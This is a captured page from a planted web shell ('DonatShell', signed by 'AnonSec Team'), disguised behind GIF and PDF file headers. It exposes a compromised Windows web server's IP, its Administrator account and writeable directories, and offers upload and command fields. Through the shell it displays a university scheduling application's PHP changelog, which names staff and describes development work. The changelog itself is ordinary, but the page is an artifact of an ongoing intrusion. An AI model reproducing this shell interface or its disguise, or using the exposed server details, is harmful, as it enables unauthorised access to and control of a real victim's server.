GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler//site_ChangeLog.phpinc
<?
// site_ChangeLog.phpinc
// Display site needs on the main page.

t_Begin(); // Begin TRACKing site_ChangeLog.phpinc.

?>
<h2 class="center mainnotes nobm">Change log</h2>
<div class="mainnotes">
	
<table class="mainnotes">
<tr>	<th>User</th>	<th>Date</th>	<th class="left">Change</th>	</tr>
<!-- Copy row below to top row of table to add change.
<tr>	<td>user</td>				<td>yyyy_mm_dd</td>	<td>change</td>	</tr>
-->
<tr>	<td>Jim M</td>				<td>2020-02-26</td>	<td>SCD dialog width is now correct for 2+ meetings. May need to still fix individual meeting widths as these may be different.</td>	</tr>
<tr>	<td>Jim M</td>				<td>2020-02-21</td>	<td>Fixed import of OFF CAMPUS class meetings.</td>	</tr>
<tr>	<td>Jim M</td>				<td>2019-03-22</td>	<td>Friday work session:
	<ol class="tight">
		<li>Fixed text highlight when dragging Schedule Class dialog.</li>
		<li>Started work of parsing classes.</li>
		<li>Need to manage sessions first. See /admin/session. Preset done. Form done.</li>
	</ol>
	</td>
</tr>
<tr>	<td>Jim M</td>				<td>2019-03-15</td>	<td>Friday work session:
	<ol class="tight">
		<li>dateStartEnd_Set[] function fixed.</li>
		<li>It now fixes the start date and then calls dateStartEnd_Set_End[] to fix the end date.</li>
	</ol>
	</td>
</tr>
<tr>	<td>Jim M</td>				<td>2019-03-01</td>	<td>Friday work session:
	<ol class="tight">
		<li>Work on Full button for class meeting dates. <b>Still need to finish clearing errors.</b>
		<br>
		dateStartEnd_Set[] must clear the errors. (site.js pp 80)
		Problem is AJAX calls needed for start AND end dates.
		When Validate is called for start date, a return function is set for the start date.
		Then Validate is called for the end date and the return function for the start date is over-written and never called.
		See comments on lines 91,92.
		</li>
		<li>Other problems found and added to site needs.</li>
	</ol>
	</td>
</tr>
<tr>	<td>Jim M</td>				<td>2019-02-15</td>	<td>Friday work session:
	<ol class="tight">
		<li>Enable Schedule class dialog Update class button.</li>
		<li>Enable Schedule class dialog Add class button.</li>
		<li>Work on Full button for class meeting dates. <b>Still need to finish clearing errors.</b></li>
	</ol>
	</td>
</tr>
<tr>	<td>Jim M</td>				<td>2018-04-17</td>	<td>Tyson and I added ClassMeeting_SetHeight() function to improve Schecule Class dialog meeting display.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-04-07</td>	<td>Highlight conflict fixed. Needed to create EVENT objects for each day before testing for conflicts.<br>Class meeting Drag/move/drop partially fixed. The end time is not recalculated.<br><b>2nd half</b> button for meeting Dates fixed.<br>Added city icon to Class Meeting if only on one campus.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-04-06</td>	<td>js_write_Schedule.phpinc now creates the Credential object.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-04-04</td>	<td>Schedule view via js - js and php to change Schedule view settings without form submit.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-03-24</td>	<td>Moved finished work by Cody Kurowski and Garrett Wiley to /Schedule/schedule.js.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-03-22</td>	<td>Moved /css/site#.css code to applicationSite.php. Also added code for /js/site#.js.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2018-03-22</td>	<td>Changed order and some styling on the /index.php page.</td>	</tr>
<tr>	<td>James H</td>		<td>2017-04-11</td>	<td>Added background image, and reduced scheduler header title's length, was redundant, refer to "/Scheduler/index.php" line 17 to revert.</td>	</tr>
<tr>	<td>James H</td>		<td>2017-04-10</td>	<td>Styled the side navigation bar and centered the top nav bar.</td>	</tr>
<tr>	<td>James H</td>		<td>2017-03-30</td>	<td>Reformatted login page, centered login panel and changed and moved "invalid login" text</td></tr>
<tr>	<td>James H</td>		<td>2017-03-29</td>	<td>Made the "Schedule Class" box on the Schedule page only draggable by its header.</td></tr>
<tr>	<td>James H</td>		<td>2017-03-29</td>	<td>Consololidated CSS pages to "site.css"</td>	</tr>
<tr>	<td>Jim M</td>			<td>2016-04-25</td>	<td>Updated code to display class meetings on the calendar.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2016-02-19</td>	<td>Added credential and course management.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2016-02-07</td>	<td>Put curent sheduler up to CST website.</td>	</tr>
<tr>	<td>Jim M</td>			<td>2016-02-26</td>	<td>Added Course and Credential Management and updated scheduler.</td>	</tr>

</table>
</div>
<?

t_End(); // End TRACKing site_ChangeLog.phpinc.
?>

Anon7 - 2022
AnonSec Team